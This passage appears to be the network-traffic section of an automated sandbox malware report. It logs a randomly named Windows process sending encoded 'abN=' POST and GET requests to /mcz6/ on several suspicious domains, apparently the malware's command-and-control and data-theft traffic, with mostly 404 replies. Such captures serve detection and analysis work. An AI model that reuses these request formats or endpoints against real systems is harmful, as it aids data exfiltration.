Jun 5, 2024 15:06:38.298269033 CEST	10850	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 7a 30 67 55 45 53 49 53 4b 42 75 56 43 30 77 55 4d 59 68 6b 38 50 56 45 7a 73 50 73 37 6a 67 59 52 6f 74 37 4b 73 67 2f 70 51 68 33 64 72 58 41 78 39 6e 42 77 52 71 4c 67 53 51 34 36 4f 6d 4b 75 52 2f 43 58 69 33 52 47 2f 5a 76 35 39 50 33 37 34 62 57 72 61 77 36 4d 48 77 34 48 71 47 33 75 77 38 42 4b 32 71 2f 44 65 77 56 69 6b 4e 54 45 7a 61 79 46 44 6f 71 58 7a 69 4c 6d 49 4f 72 6e 30 6b 4b 41 59 4f 69 58 50 67 4d 78 4c 67 70 38 4f 6b 53 55 75 4c 69 4b 67 46 4b 4f 6e 62 69 72 4e 75 48 71 49 2f 49 4b 41 2f 59 63 6c 65 41 68 77 71 64 6a 48 6d 72 64 42 76 4b 68 2f 32 4a 79 69 6a 56 72 37 56 6d 4d 41 63 6e 6d 74 35 59 43 41 54 78 64 6c 32 62 47 4c 78 59 77 6d 56 69 6f 71 55 63 70 67 43 79 5a 41 72 4e 4d 66 4a 57 52 36 52 31 67 4e 6b 59 46 34 78 58 4e 70 78 54 46 65 4e 54 50 39 73 75 4c 4a 53 4a 59 31 68 42 35 30 50 36 6c 61 78 54 30 4c 55 34 37 73 51 34 36 52 45 57 6f [TRUNCATED] Data Ascii: abN=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6Dz0gUESISKBuVC0wUMYhk8PVEzsPs7jgYRot7Ksg/pQh3drXAx9nBwRqLgSQ46OmKuR/CXi3RG/Zv59P374bWraw6MHw4HqG3uw8BK2q/DewVikNTEzayFDoqXziLmIOrn0kKAYOiXPgMxLgp8OkSUuLiKgFKOnbirNuHqI/IKA/YcleAhwqdjHmrdBvKh/2JyijVr7VmMAcnmt5YCATxdl2bGLxYwmVioqUcpgCyZArNMfJWR6R1gNkYF4xXNpxTFeNTP9suLJSJY1hB50P6laxT0LU47sQ46REWoSC4+KN9NgVwS/ffZKv6u5JXzDsBMqOdP2prZAYZOnh9Kpu4ZNkk5oOUwCjXiYSmVO2kC92UPowKR8XHglm0h2Q9FnYnIsYB+NpE0cHsQFQ7esysas6QVT6rfqKLqOZrK3iuXmpBxJePVCGIMw3eGrxy/Su2sRUA21UK0rWPqw+tfAkqrVMwGHBJDF/HUno1dx/CTf68p+CaKsEHsF86zcGE7WYa3gvvh6jI/kcrmShf8YhVMoJ9X3GdB3v8B8O/jGhfb+ShHTc7bFVtYeYODn7u9ovag+/G4opfJisscVphlhXGSyFfcO5+UWgGMEawzdH56PG/MhOTYFiaD+KK2mZICq4idXAwKwsjPHqzspBULxjHCJRQ4LW0JXylY4XkaASRI2bNinxuDK6uzgiSlCsJF9ZxpEoSxIqRbjc+hAxPI6rfu8M5yvv3FZSYIi4M4T3G9P8+W2DRzXDF2ANMZuqhtu7Z/Q7LhbzBUUajRqKPyIfRKVL0uvpxKW1bnjN7mxQtG173HRFmsiBJu+On/1BxX0CXckQ6c5nISSVxsd9rzP2x9P7KTCkWMq8e7lAeYWdjc6PEo/IVsXy6rqPwagbbrlr9FrnnQgqCqbbcCgqCgRwejyieJ9nC5d4GPI6z58uKns2PdinUx2+o3SdDL5lUOVvHGGSL8y4 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49760	91.195.240.123	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:40.827174902 CEST	482	OUT	GET /mcz6/?abN=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:06:41.669059992 CEST	113	IN	HTTP/1.1 439 date: Wed, 05 Jun 2024 13:06:41 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49761	162.0.237.22	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:47.327508926 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 35 42 36 45 77 7a 70 41 74 63 4d 79 61 2f 43 39 4c 4b 2f 44 71 42 50 30 64 69 4a 37 33 71 46 65 4e 70 51 49 53 31 65 7a 55 76 4c 69 42 67 51 6b 30 70 61 77 6b 71 34 4c 53 74 39 6f 43 6a 49 30 72 64 4b 50 52 42 46 53 69 4e 4a 59 69 5a 6e 4d 2b 39 48 76 56 2f 62 5a 62 66 6b 65 47 56 43 44 61 64 53 6d 52 4e 2b 75 32 62 52 53 57 56 46 61 4b 4c 6f 79 2f 53 67 59 79 70 4a 42 6e 68 4b 45 38 56 34 4a 73 6c 38 35 4c 4d 48 59 68 76 53 61 65 6d 63 69 78 63 32 59 47 50 56 55 4d 53 50 53 5a 71 5a 79 47 79 46 41 64 6d 66 77 43 45 37 70 64 53 33 30 53 41 3d 3d Data Ascii: abN=U51Zs5j/nfea5B6EwzpAtcMya/C9LK/DqBP0diJ73qFeNpQIS1ezUvLiBgQk0pawkq4LSt9oCjI0rdKPRBFSiNJYiZnM+9HvV/bZbfkeGVCDadSmRN+u2bRSWVFaKLoy/SgYypJBnhKE8V4Jsl85LMHYhvSaemcixc2YGPVUMSPSZqZyGyFAdmfwCE7pdS30SA==
Jun 5, 2024 15:06:47.994232893 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49762	162.0.237.22	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:49.864855051 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 78 65 44 74 63 49 52 30 65 7a 54 76 4c 69 55 51 51 74 70 35 61 4e 6b 71 38 70 53 76 70 6f 43 67 30 30 72 64 36 50 57 32 52 54 6a 64 4a 61 2b 5a 6e 4b 68 4e 48 76 56 2f 62 5a 62 65 42 37 47 56 4b 44 62 74 43 6d 65 4d 2b 74 70 72 52 52 41 46 46 61 42 72 6f 32 2f 53 68 50 79 6f 56 6e 6e 6a 79 45 38 55 49 4a 76 30 38 34 51 38 48 6b 73 50 54 76 52 6e 42 61 2f 63 65 5a 4f 66 35 52 4c 54 7a 64 63 73 49 6f 58 44 6b 58 50 6d 37 44 66 44 79 64 51 52 4b 39 4a 4c 52 75 32 69 51 4b 33 79 4a 62 34 57 55 44 4b 77 70 65 37 78 49 3d Data Ascii: abN=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIxeDtcIR0ezTvLiUQQtp5aNkq8pSvpoCg00rd6PW2RTjdJa+ZnKhNHvV/bZbeB7GVKDbtCmeM+tprRRAFFaBro2/ShPyoVnnjyE8UIJv084Q8HksPTvRnBa/ceZOf5RLTzdcsIoXDkXPm7DfDydQRK9JLRu2iQK3yJb4WUDKwpe7xI=
Jun 5, 2024 15:06:50.527550936 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49763	162.0.237.22	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:52.392635107 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 4a 65 44 65 55 49 57 6e 32 7a 53 76 4c 69 56 51 51 6f 70 35 61 63 6b 71 45 74 53 76 6c 53 43 6c 77 30 72 2b 79 50 54 48 52 54 73 64 4a 61 6d 5a 6e 50 2b 39 47 6c 56 2f 4c 64 62 66 78 37 47 56 4b 44 62 6f 47 6d 61 64 2b 74 36 37 52 53 57 56 46 47 4b 4c 6f 61 2f 53 35 66 79 70 67 61 6d 51 36 45 38 30 59 4a 75 47 55 34 63 38 48 63 69 76 54 33 52 6e 4e 46 2f 63 44 67 4f 66 39 37 4c 54 58 64 51 72 6c 2b 44 77 6b 4f 59 55 2f 65 42 41 62 34 55 43 32 69 42 37 4a 78 6d 44 49 30 68 57 52 47 79 32 63 48 50 7a 49 61 6c 47 2b 44 70 70 2f 49 70 6b 52 59 49 52 4a 57 73 34 53 64 61 47 37 75 6e 6a 59 45 48 30 31 62 35 33 38 51 61 46 67 48 56 58 39 50 33 51 78 55 5a 6b 6b 37 34 78 7a 47 79 53 4f 4f 4d 72 43 70 6e 69 6f 4a 38 47 51 69 6a 54 6d 6a 47 41 4c 36 54 4d 41 63 30 73 65 53 75 62 58 76 71 4b 55 36 4d 67 73 59 46 4f 70 2f 33 4c 6e 6c 6b 72 62 7a 6a 75 56 48 59 7a 2b 46 2f 31 [TRUNCATED] Data Ascii: abN=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIJeDeUIWn2zSvLiVQQop5ackqEtSvlSClw0r+yPTHRTsdJamZnP+9GlV/Ldbfx7GVKDboGmad+t67RSWVFGKLoa/S5fypgamQ6E80YJuGU4c8HcivT3RnNF/cDgOf97LTXdQrl+DwkOYU/eBAb4UC2iB7JxmDI0hWRGy2cHPzIalG+Dpp/IpkRYIRJWs4SdaG7unjYEH01b538QaFgHVX9P3QxUZkk74xzGySOOMrCpnioJ8GQijTmjGAL6TMAc0seSubXvqKU6MgsYFOp/3LnlkrbzjuVHYz+F/10c/3VcOrNcPwmhk9lsKQy0UHAC88BhwvvPSnAKQF1M4hgPkmDWFYuoIoJ3Gf6Nv1b/3FIAt7PCNJaTcTZIgcauxW4MQ7QcTKgXkcC6oRupfXyOBkdU74usK2iaiNru3/ZNwwVYZS79iOnKxdL62472iAuX0uzJ4buvCQq3E02ihrioB9fU+p90DR3d/rDnBn0iriIvOcoHCc92Edw6pxnkDGo8409kcXG8v/m2kFSHnykDY2wiQcBUAyEV/MmseHc2NU8IIXEVE0xXwA3N9yukdTrGu/sED55L4MfpXWu5ttR7UjENxzJ3tU8uv6jnLf8IRzibe8G3jt6y5lCflgRqV7IRbLydsc1d9XGYjLuadBJnoBGDLmNMdr9Lt6SCVJB0comE4/UbSk7ZXraii+giYpVPW+GvETDSEFRtPm63r5fNAxNa1iD4bs7kCS8oGdxr6UbJGuMB9ItXeAGOXLHz26RU2fdj2I5pmlcaGk9NHZGdLLV4RvDwl9aDBRmiPeHtg2qooLDVIKnanhWWn6LQGx0X31ORz8kCLBsOrcWo1OrlOQux4664HxcKBNvWvuRZpMgtW3o06sMqNhB0qopg+rbHEHNMwQnVYUircy6RZX2HSnuYDdOjqLDNKAWdvZui55l9uAgM8nGD17itShzALsEo3CtEw/xr [TRUNCATED]
Jun 5, 2024 15:06:53.051278114 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:52 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49764	162.0.237.22	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:54.922157049 CEST	479	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks= HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:06:55.589430094 CEST	548	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:06:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49765	136.143.186.12	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:07:09.527378082 CEST	730	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 57 7a 75 49 72 4d 6a 34 31 68 48 31 6d 2b 63 48 78 68 34 75 43 6c 6a 66 6b 67 75 39 77 66 6f 76 69 30 6a 48 74 65 46 59 69 39 71 62 38 71 6a 50 69 49 45 72 69 65 75 74 73 77 41 58 76 50 51 78 67 4c 36 42 77 64 31 67 76 32 54 4d 2f 6e 75 32 76 59 32 32 69 57 6c 49 39 7a 66 38 53 64 4c 79 59 39 30 65 42 32 46 33 38 6b 74 69 55 43 66 46 63 4b 33 42 51 56 35 2f 56 43 55 54 50 56 71 64 6b 54 7a 6b 67 4e 38 69 72 39 45 33 31 2b 37 30 5a 74 39 68 46 79 65 37 57 54 64 39 6a 66 5a 73 53 56 61 46 6f 72 74 51 62 30 77 62 48 35 39 35 53 72 73 2f 6d 51 3d 3d Data Ascii: abN=0fX/3Vj8k6G9WzuIrMj41hH1m+cHxh4uCljfkgu9wfovi0jHteFYi9qb8qjPiIErieutswAXvPQxgL6Bwd1gv2TM/nu2vY22iWlI9zf8SdLyY90eB2F38ktiUCfFcK3BQV5/VCUTPVqdkTzkgN8ir9E31+70Zt9hFye7WTd9jfZsSVaFortQb0wbH595Srs/mQ==
Jun 5, 2024 15:07:10.268218994 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 05 Jun 2024 13:07:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/ Set-Cookie: csrfc=3cb2ec30-e70c-4ef3-9efe-cb653a3d9748;path=/;priority=high Set-Cookie: _zcsr_tmp=3cb2ec30-e70c-4ef3-9efe-cb653a3d9748;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 14 d9 c1 9a 0c c5 9e 3a 20 03 86 0d 7b a1 25 ca e2 42 89 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 92 e5 69 76 03 8b e2 b9 f1 7c df 39 24 1b 7d b8 fd 7e f3 db 1f bf fe 8c 32 95 b3 d5 0f 51 f5 83 10 8a 32 82 13 f3 a4 07 39 51 18 15 38 27 4b 4b f0 35 57 d2 42 31 2f 14 29 d4 d2 2a 38 2d 12 b2 3f 47 05 4f 39 63 7c a7 9f b0 88 33 fa 40 f4 a3 2c 68 59 12 65 21 e7 68 4e 51 c5 c8 ea 4f 9e f1 c8 a9 9e 0f 33 8c 16 f7 48 3d 96 e0 48 91 bd 72 62 09 ae 04 61 4b 4b aa 47 46 64 46 b4 a5 4c 90 74 69 39 3b b2 4e 21 0a 79 9d e2 9c b2 c7 e5 f7 92 14 3f de e1 42 86 33 d7 3d bf 70 5d eb 68 d7 68 1f 46 f0 59 f3 e4 f1 f9 34 84 8f b6 64 57 86 42 4b 5b 42 da 92 75 8e 24 fc d8 92 08 9a 5e f5 15 24 7d 22 e1 74 5a ee db 73 39 16 1b 5a 84 2e bc 47 ad 89 12 27 09 2d 36 03 33 6b 1c df 6f 04 df 16 89 1d 73 c6 45 78 96 06 fa db 30 fc cf e9 71 a2 78 79 a3 c5 e4 f3 88 95 10 d9 39 7f b2 21 a1 04 0b 7b 23 70 42 01 ae cf 8c a4 ea 1c 9d a5 [TRUNCATED] Data Ascii: 56cX[o6~`h%+v: {%BINRkiv\|9$}~2Q29Q8'KK5WB1/)8-?GO9c\|3@,hYe!hNQO3H=HrbaKKGFdFLti9;N!y?B3=p]hhFY4dWBK[Bu$^$}"tZs9Z.G'-63kosEx0qxy9!{#pBl'xz=pgs?h#34]5u?~],=[2B7M,rL`cGHe4<g.;o]c9/0~EBBuIh[2},t;s?V\|j`8V!N2\|X`-M1lbq\h#:5&b> QF^@3z]EgFlK1(KUA5,Uy@/l49^FMf#
Jun 5, 2024 15:07:10.268280983 CEST	715	IN	Data Raw: fc 31 b8 74 91 bf 07 8e 37 81 fa 5a be 27 95 00 ec b3 cf e3 39 81 d9 e6 26 d7 54 4f b8 6e 9a 55 a7 e9 58 a8 bb 8f ee e1 b7 c1 98 be d1 a6 45 ca 47 ca c4 24 7c 36 5e 6a 47 7d c4 28 ea da 68 c2 7e f1 02 64 9a ad 80 5b 67 9a 51 09 da fa bc 01 e9 2d Data Ascii: 1t7Z'9&TOnUXEG$\|6^jG}(h~d[gQ-$t86mwMOwKk/2?P9_]o=y+8Zo*^N0bV]s]$=OT[$pg?vQo2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
